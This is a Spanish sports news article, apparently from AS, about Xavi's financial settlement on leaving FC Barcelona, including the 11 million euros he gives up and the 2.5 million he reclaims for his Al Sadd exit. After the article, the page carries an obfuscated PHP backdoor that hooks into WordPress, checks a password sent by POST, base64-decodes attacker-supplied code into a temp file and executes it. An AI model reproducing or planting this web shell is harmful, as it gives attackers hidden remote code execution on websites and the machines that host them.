Xavi renuncia a 11 millones de salario y recibirá los 2,5 millones que puso para salir del Al Sadd

Era la mitad de la cláusula que abonó para dejar el fútbol qatarí en noviembre de 2021 para fichar por el Barcelona. Ya hay acuerdo para su salida. Xavi renuncia a once millones de euros.

Además de renunciar al año de contrato que le restaba (11 millones de euros), Xavi no sólo apretó al Barça para que su staff técnico cobrase hasta el último euro de su contrato, que expiraba en 2025. Según confirmó AS, reclamó al club azulgrana los 2,5 millones de euros que puso de su bolsillo para salir del Al Sadd y que equivalían a la mitad de la cláusula de rescisión que el club azulgrana tuvo que abonar para salir de Qatar en aquellos días de otoño de 2021 en los que su llegada se convirtió en un culebrón.

Fernando Solanas, agente del jugador y uno de las principales caras de la empresa AC Talent, que representa a Xavi, estuvo ayer en las oficinas del Barça para intentar cerrar los flecos del acuerdo. Xavi ya había prometido que no sería un problema para el club y había desvelado, cuando anunció su marcha a finales de enero, que renunciaría a su año de contrato. La leyenda azulgrana mantuvo su palabra, pero el hecho de que Laporta le despidiese después de renovar su confianza, cambió en cierto modo las condiciones. Xavi quiso proteger a sus ayudantes para que tengan un colchón económico de seguridad. Las negociaciones han atrasado el anuncio oficial de Flick pese a que el Barça ya comunicó oficialmente que Xavi no seguiría (hubiese acuerdo para el finiquito o no). En principio, y salvo ofertón, Xavi se tomará un año sabático.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}